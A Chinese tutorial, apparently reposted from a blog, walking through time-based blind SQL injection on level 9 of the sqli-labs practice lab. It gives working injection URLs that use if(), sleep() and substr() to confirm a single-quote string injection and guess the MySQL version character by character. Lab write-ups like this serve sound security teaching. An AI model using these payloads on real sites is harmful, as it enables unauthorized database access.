文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

MySQL之延时注入(3分钟搞懂盲注思路)

2023-09-13 08:14

关注

延时(时间)注入(盲注)

任务:sqli_labs第9关,通过延时注入,获取版本号

思路

通过单引号,双引号判断字符类型,再观察是否有回显,发现没有回显,而且页面也没有其他变化,看上去似乎是静态页面。

由于页面没有任何变化,导致无法判断出是字符型还是数字型注入

所以思路就要想到延时注入了,通过if 与 sleep()函数,根据响应时间来猜出是字符型还是数值型注入。

判断注入类型

http://localhost/sqli_labs/Less-9/?id=1' and if(1=1,sleep(4),2)--+

通过and if(1=1,sleep(4), 2)来设置判断条件与响应时间,我们可以在 id=1之后通过各种符号尝试闭合,并且需要在结尾加上 --+注释后面的sql语句,然后根据响应时间来判断注入类型

通过这种方式,我们可以判断出这关的注入类型为字符型,而且是使用单引号闭合。

盲猜手法

主要通过if里面的判断条件,在利用substr来截取版本号的数字,将截取的数字通过if判断,最后根据响应时间来判断是否猜测正确

盲猜版本号

一般版本号都是这种格式:x.x.xx,所以可以根据这个格式,再使用二分查找法来猜测版本号,注意小数点也算字符

猜第一个数字:http://localhost/sqli_labs/Less-9/?id=1' and if(substr(version(),1,1)=5,sleep(4),2)--+猜第二个数字:http://localhost/sqli_labs/Less-9/?id=1' and if(substr(version(),3,1)=7,sleep(4),2)--+猜第3个数字:http://localhost/sqli_labs/Less-9/?id=1' and if(substr(version(),5,2)=26,sleep(4),2)--+

关键命令解释:

if(substr(version(),5,2)=26,sleep(4),2):从版本号的第5个字符开始截取,截取2个字符,然后将其与26比较,如果结果为true,就进行sleep(4),否则返回2

来源地址:https://blog.csdn.net/weixin_46367450/article/details/132461056

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-数据库
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯